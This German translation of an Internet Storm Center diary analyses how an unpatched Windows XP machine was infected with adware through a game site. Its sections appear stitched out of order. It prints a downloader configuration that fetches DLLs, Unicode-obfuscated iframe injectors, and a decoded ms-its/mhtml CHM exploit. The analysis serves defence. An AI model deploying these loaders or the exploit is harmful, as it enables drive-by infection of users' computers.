Wie schnell man sich (PC-)Schädlinge einfängt

Praxis
Schädlingen auf der Spur

Dies ist ein Tagebucheintrag des Diensthabenden im Internet Storm Center. heise Security veröffentlicht die deutsche Übersetzung mit freundlicher Genehmigung des ISC und des Autors Tom Liston.

Achtung: Die Links in diesem Artikel lassen sich absichtlich nicht anklicken. BESUCHEN SIE DIESE SEITEN NICHT. SIE SIND GEMEINT. ECHT. Einige Leser berichten, dass ihre Antiviren-Software sogar beim Öffnen dieses Artikels Alarm schlägt. Dieser Fehlalarm bezieht sich auf die abgedruckten Listing-Teile und kann ignoriert werden. Um weitere Fehlalarme zu vermeiden, wurde an einigen Stellen "<>" durch "[]" ersetzt.

Willkommen zum zweiten Teil unserer Reise durch die dunklen Ecken des Internet. Bei allen, die nach dem ersten ungeduldig auf die Fortsetzung gewartet haben, möchte ich mich entschuldigen, dass es so lange gedauert hat, das alles zusammenzustellen. Falls Sie den ersten Teil verpasst haben oder noch mal kurz nachlesen wollen, um was es ging, finden Sie ihn hier:

Lassen Sie sich ruhig Zeit ... ich warte.

Fertig? Gut.

Als wir unseren unerschrockenen "Otto Normalo" verließen, hatte er ein neues Windows XP Home installiert und sich auf die Suche nach Spaß und Abenteuer ins Internet begeben. Jemand hatte ihm von Yahoo! Games erzählt, die er mal ausprobieren wollte. Über Google landete er auf der Seite

. Ab da ging es rund.

Über einen IFRAME mit einen CHM-Exploit wurde Ottos nagelneuer Computer in etwas neues verwandelt -- etwas was er sich nie hätte träumen lassen: einen P.A.L. -- einen "PC Anderer Leute"

Wie bitte?

Naja, obwohl der PC noch Otto gehört ("owned" mit "o") und er die Ehre hat, ihn mit Strom und einer Internet-Verbindung zu versorgen, kontrollieren ihn andere ("0wned" mit Null). Und die lassen die schöne Hardware nach IHRER Pfeife tanzen.

Otto will eigentlich nur in aller Ruhe eine Runde "Donut Boy 2" von der yahoogamez-Seite spielen, doch die netten kleinen Freunde, die er sich dort eingefangen hat, haben anderes im Sinn. Am Ende von Teil 1 hatte sich Folgendes auf Ottos PC geändert:

1. Ottos Startseite wurde geändert. Sie zeigt jetzt auf:

2. Die Standardsuchseite wurde umgebogen:

3. Der Suchassistent wurde abgeschaltet
4. "TV Media Display" wurde auf dem PC installiert (mehr dazu später).
5. addictivetechnologies.net hat Ottos System mit einer Datei beglückt, die Antiviren-Software als Win32/TrojanDownloader.Rameh.C identifiziert.

Was führen Ottos neue Freunde wohl weiter im Schilde? Lassen Sie uns den Spuren weiter folgen und als Erstes mal die Datei näher untersuchen, die Otto von Addictive Technologies "bekommen" hat. Das war eine.cab-Datei mit dem Namen "fr03tp.cab,", die zwei Dateien enthielt:

ATPartners.inf - 403 bytes
ATPartners.dll - 96,256 bytes

(Ein kleiner Kommentar: ATPartners.dll enthält eine statisch gelinkte Kopie der MSVC-Runtime-Umgebung. Das ist komplett unnütz. Addictive Technologies: Wenn ihr schon Schädlinge schreibt -- schreibt sie wenigstens EFFIZIENT.)

Wenn wir die Strings in der DLL-Datei untersuchen, stoßen wir auf recht interessante Dinge:

/F1/Cmd4F1_fr03t.txt

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Browser Helper Objects

und auch auf einige ziemlich seltsame:

Hara Hara Mahadev !!!
tum agar badshah hai to hum eespeek ka yekka!

(Kann mich da jemand aufklären?)

Stellen wir die ersten Teile dieser Liste richtig zusammen, ergibt sich die URL

unter der wir eine interessante Datei finden:

[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[AddF1]
Folder=AT-Games
Link=http://www.gamehouse.com/affiliates/template.jsp?AID=2226
Name=Gamehouse Games

[AddF2]
Folder=AT-Games
Link=http://www.regnow.com/softsell/
visitor.cgi?affiliate=24998&action=site&vendor=7551
Name=Big Fish Games

[AddF3]
Folder=AT-Games
Link=http://www.regnow.com/softsell/
visitor.cgi?affiliate=24998&action=site&vendor=7834
Name=FlyorDie Games

[AddF4]
Folder=..\\Desktop\\
Link=http://www.007arcadegames.com
Name=007arcadegames.com
IconFile=http://www.007arcadegames.com/007.ico
IconIndex=0

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/ezbdlLs.dll
InstallName1=bdlds.dll
RepURL1=http://www.f1organizer.com/F1/audit/Ack/Ack4Freeze.htm

Server2=www.AddictiveTechnologies.net
Object2=/LoadShare/SplWbr.dll
InstallName2=SplWbr.dll
RepURL2=http://www.f1organizer.com/F1/audit/Ack/Ack4SB2.htm

(Geht es nur mir so oder finden auch andere den Ausdruck "softsell" in den RegNow-URLs mehr als amüsant?)

Sieh an! Da wurde noch mehr auf Ottos Rechner "aktualisiert". Ok, untersuchen wir das mal genauer: Die fügen einige Links in Ottos Internet-Favoriten ein, um Online-Game-Shops zu fördern, auf denen AT Provisionen kassiert (Gamehouse Games, Big Fish Games and FlyorDie Games). Auf Ottos Desktop haben sie einen Link zu "007arcadegames," angelegt und sie laden auch gleich noch ein paar Geschenke für Otto herunter: ezbdlLs.dll und SplWbr.dll.

SplWbr.dll hat ein Kampfgewicht von stolzen 454.656 Bytes. Es ist das, was man in der Antivirus-Branche als "File Dropper" bezeichnet: Wenn man ihn ausführt, installiert er eine oder mehrere Dateien, die als Daten angehängt sind. In diesem Fall spuckt er zwei Dateien aus.

Datei #1 -- 135.088 Bytes, die behaupten, sie wären ein "Ad Destroyer and Virtual Bouncer Installation" (Bouncer: Türsteher, Rausschmeißer). Das Ganze ist digital signiert von Spyware Labs, Inc. (

).

Datei #2 -- 302.544 Bytes, die still und leise "TopRebates.com AutoTrack software" installieren. (

).

ezbdlLs.dll ist eine 151.040-Byte-große, UPX-komprimierte DLL, die sich ausgepackt auf 176.128 Bytes aufbläht. Auch diese Datei ist ein File Dropper mit drei neuen Gaben für Ottos PC:

Datei #1 -- 65.536 Bytes ASPack-komprimierter Güte von

, die sich als ein "Werkzeug für das Herunterladen von Dateien und das Aktualisieren von Software" präsentieren.

Datei #2 -- 33.280 Bytes UPX-gepackter Freude, die sich in 65.536 Byte Schrott-Software der netten Leute von ezULA (

) verwandeln. Die behaupten, sie möchten "Ihr Surfen im Internet einfach, aufregend und persönlich gestalten". Ähhh -- nein danke, lieber nicht.

Datei #3 -- 65.024 Bytes mit einem NullSoft-Installer, der Ottos System mit SAHAgent beglückt. Das ist ein Winsock2 Layered Service Provider (LSP), der sich in Ottos WinSock-Stack einklinkt -- ähnlich wie eine Personal Firewall. SAHAgent leitet ausgewählten Web-Verkehr so um, dass die Provisionen für Ottos zukünftige Online-Anschaffungen an eine bestimmte Partner-ID fließen.

Und was ist jetzt das Ergebnis dieses ganzen Durcheinanders? Otto hat jetzt fünf neue Software-Pakete installiert, die seinen Browser, seine Suchanfragen und seine Online-Geschäfte so umleiten, dass sie den (zweifellos aufrechten, netten Leuten by ATPartners in den Kram passen. Das Surfen im Internet wird zukünftig "einfach, aufregend und persönlich" (ezula), er weiß: "die besten Downloads sind kostenlos" (abetterinternet), sein Rechner zeigt ihm "klevere Tricks, Geld einzustecken" (TopRebates) und er braucht sich keine Sorgen über Adware/Spyware mehr zu machen, weil die ja der Virtual Bouncer ... äh ... draußen hält (Spyware Labs). Ach ja, noch was: Seine Online-Einkäufe bringen Geld -- irgendjemanden jedenfalls (SAHAgent). Otto sollte sich wirklich glücklich schätzen.

Aber haben Sie DIESEN Teil in der Textdatei mit den Anweisungen bemerkt, die sich ATPartners.dll nachgeladen hat?

[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

Das nächste Mal werden also andere Anweisungen nachgeladen:

[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/msbb693.dll
InstallName1=msbb321.dll
RepURL1=

Server2=www.f1organizer.com
Object2=/F1/objects/ezbdlLs.dll
InstallName2=bdlds.dll
RepURL2=

Server3=www.f1organizer.com
Object3=/F1/objects/W2020Setup.dll
InstallName3=W2020Setup.dll
RepURL3=

Server4=www.f1organizer.com
Object4=/F1/objects/MyDailyHoroscope.dll
InstallName4=MyDailyHoroscope.dll
RepURL4=

Server-4=www.f1organizer.com
Object-4=/F1/objects/ezStD.dll
InstallName-4=ezStub3.dll
RepURL-4=

Server-6=www.f1organizer.com
Object-6=/F1/objects/MoreResultsSetup.dll
InstallName-6=MoreResultsSetup.dll
RepURL-6=

Server-3=www.f1organizer.com
Object-3=/F1/objects/KVIF_11.dll
InstallName-3=KVIF_11.dll
RepURL-3=

Allein vom Ansehen dieser Liste wird mir schlecht. (Auch wenn ich über den Begriff "ezStD" lachen musste. Für diejenigen, die kein Englisch sprechen: STD ist eine Abkürzung für "S.exually Transmitted Disease" -- Geschlechtskrankheiten Natürlich könnte ich diesen Misthaufen auch noch auseinander klamüsern -- aber jetzt werden wir uns erst mal einen anderen Bereich ansehen, den Otto nicht mehr kontrolliert: seine Startseite.

Dies ist ein Tagebucheintrag des Diensthabenden im Internet Storm Center. heise Security veröffentlicht die deutsche Übersetzung mit freundlicher Genehmigung des ISC und des Autors Tom Liston. Das Original finden Sie hier.

Nachdem ich einige Adware/Spyware/Malware-Programme untersucht hatte, entschloss ich mich zu einem Experiment. Ich wollte wirklich sehen wie schnell ein ungepatchtes System kompromittiert wird -- und wie das aus der Sicht eines "Otto Normal"-Anwenders aussieht. Ich setzte dazu ein VMWare-Image einer neuen Windows-XP-Home-Installation auf und machte mich auf ins Internet. Auf dieser aufschlussreichen Reise begegnete ich einer Reihe von Gefahren, die auf den unachtsamen Wanderer lauern und ich lernte einiges über die Spy-/Adware-Industrie.

Dies ist der erste Teil meiner Analyse dessen, was mir alles zustieß, als ich die im Internet notwendigen Schutzmaßnahmen "vergaß". Der zweite Teil untersucht das volle Ausmaß des Schadens, der dem armen "Otto Normalo" zugefügt wurde. Als kleiner Vorgeschmack kann ich schon hier sagen: Wenn es nach der Adware/Spyware-Industrie geht, haben Sie zwar den PC gekauft -- aber DIE bestimmen darüber. Die unverschämte Dreistigkeit ihres Vorgehens wird Sie überraschen und ich hoffe, diese Lektüre bewegt den ein oder anderen Leser dazu, aufzuwachen und etwas zu unternehmen.

Offensichtlich hängt das, was in diesem Experiment passiert, davon ab, wohin ich im Netz gehe. Um fair zu sein: Die im Folgenden erwähnten Sites sind nicht wirklich was besonderes -- im Gegenteil: Sie sind nicht schlimmer oder besser als viele andere Ad-/Spyware-Seiten. Meine Auswahl orientierte sich an dem Vorfall, den ich ohnehin gerade untersucht hatte.

Für meinen "Otto Normalo" baute ich so gut wie möglich das gerade untersuchte System nach. Darauf lief ein Internet Explorer 6.0 mit Google Toolbar und aktviertem Popup-Blocker. Behalten Sie diese Konfiguration im Hinterkopf, wenn ich "der Spur der Schädlinge" folge.

Noch etwas, sas Sie nicht vergessen sollten: Ich werde keine der erwähnten URLs in dieser Geschichte als aktive Links setzen. Das ist Absicht. FOLGEN SIE KEINEN URLs IN DIESEM ARTIKEL, BESONDERS DANN NICHT, WENN IHR SYSTEM NICHT VOLLSTÄNDIG GEPACHT IST. SIE SIND GEMEINT. ECHT.

[Anm. des Übersetzers: Zum Zeitpunkt der Veröffentlichung unserer Übersetzung existierten die angebenen URLs immer noch. Die Warnung des Autors ist also durchaus ernst zu nehmen.]

Nachdem ich die Google Toolbar installiert hatte, machte ich dasselbe, wie mein "Otto Normalo", als er sich sein System infiziert hatte: Ich habe gegoogelt. Jemand hatte ihm von "Yahoo Games" erzählt und er wollte sich das mal ansehen. Ich gab bei Google "Yahoo Games" ein und übersprang (warum auch immer... schließlich machte das auch mein "Otto Normalo") ein paar Links, die offensichtlich zu Yahoo! führten. Statt dessen klickte ich auf "www.yahoogamez.com" (ACHTUNG: Wenn ihr System nicht voll gepacht ist, GEHEN SIE DA NICHT HIN).

Web-Seite Yahoo Gamez
Auf den ersten Blick erscheint die Seite völlig harmlos.

yahoogamez.com ist eine Web-Seite mit Links zu vielen verschiedenen Online-Spielen. Ich weiß zwar nicht, ob die Spiele was taugen, aber die Werbung dort ist ziemlich interessant. Wie bei vielen Web-Sites, die Online-Spiele anbieten, beruht das Geschäftsmodell darauf, Leute auf die Seite zu leiten und über die dort eingebauten Anzeigen Geld zu verdienen. Dabei hängt der Umsatz davon ab, wie oft eine Anzeige erscheint und ganz besonders davon, wie oft darauf geklickt wird. In der Regel hat der Seitenbetreiber einen Vertrag mit einem Zwischenhändler, der an Werbekunden "Platzierungen" auf den Seiten verkauft, mit deren Betreibern er Verträge hat. Die meisten dieser Online-Anzeigenfirmen stellen dann Server bereit, die dann den Code und die Anzeigenmotive an die teilnehmenden Web-Sites ausliefern.

Auf der Site von yahoogamez.com werden an zwei Stellen Anzeigen eingeblendet, die "aim4media.com" bereitstellt. Wenn man die yahoogamez-Seite aufruft, gibt es einen Sturm von HTTP-Anfragen, darunter die folgende:

[20/Jul/2004:13:50:11 -0500] "GET_http://adserver.aim4media.com" - - "/adframe.php?n=a788e363&what=zone:450&;%20amp;target=_new HTTP/1.1"

Sie liefert den folgenden HTML-Code zurück:

<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0'
style='background-color:transparent'>
<iframe src="http://205.236.189.58/mynet/mynet-MML.html"
width=468 height=60 hspace=0 vspace=0 frameborder=0
marginheight=0 marginwidth=0 scrolling=no>
<a href="http://205.236.189.58/mynet/mynet-MML.html"
target="_blank">
<img width=468 height=60
src="http://205.236.189.58/mynet/mynet-MML.html"border=0>
</a>
</iframe><div id="beacon_459" style="
position: absolute; left: 0px; top: 0px; visibility: hidden;">
<img src='http://adserver.aim4media.com/adlog.php?bannerid=459&
amp;clientid=431&amp;zoneid=450&amp;source=&amp;
block=86400&amp;capping=3&amp;cb=7da741942b0623acd85070683ffa3ad8'
width='0' height='0' alt='' style='width: 0px; height: 0px;'>
</div>
</body>
</html>

Der iFrame erzeugt wieder einen HTTP-GET-Aufruf:

[20/Jul/2004:13:50:14 -0500] "GET_http://205.236.189.58" - - "/mynet/mynet-MML.html HTTP/1.1"

der den folgenden HTML-Code herunterlädt:

<a href="http://www.lovemynet.com/?frombanner2"
target="_blank">
<img src="http://209.50.251.182/lovemynet/banner1.gif"
width=468 height=60 border=0>
</a>
<!-- HP2 -->
<script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022
\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e
\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\u0070\u0032\u002f\u0068\u0070
\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d
\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f
\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>

Das sieht ganz so aus, als wollte jemand etwas verstecken. Dekodiert ergibt es:

<iframe src="http://69.50.139.61/hp2/hp2.htm" width=1 height=1></iframe>

[20/Jul/2004:13:50:17 -0500] "GET_http://69.50.139.61" - - "/hp2/hp2.htm HTTP/1.1"

was dann das hier liefert:

<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->
<script type="text/javascript">document.write('
\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d
\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d
\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065
\u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a
\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031
\u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066
\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048
\u007d\u002f\u0048\u0050\u0032\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068
\u0070\u0032\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d
\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070
\u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063
\u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065
\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074
\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061
\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020
\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077
\u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c
\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075
\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063
\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e
\u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0032\u002e\u0068\u0074
\u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063
\u0072\u0069\u0070\u0074\u003e')</script>

Dekodiert ergibt das:

<textarea id="code" style="display:none;">
<object
data="ms-its:mhtml:file://C:\foo.mht!${PATH}/HP2.CHM::/hp2.htm"
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,loca
</script>

[Anm. des Übersetzers: Das ist offensichtlich der Exploit, der im Browsercheck als "Installieren und Ausführen von Dateien via mhtml-Redirect" demonstriert wird. Das "m" aus dem URI "ms-its:" kodiert der Autor dieses Exploits über die HTML-Darstellung m -- wahrscheinlich, um die Erkennung durch Filter und Antiviren-Software weiter zu erschweren.]

Zum Vergrößern anklicken....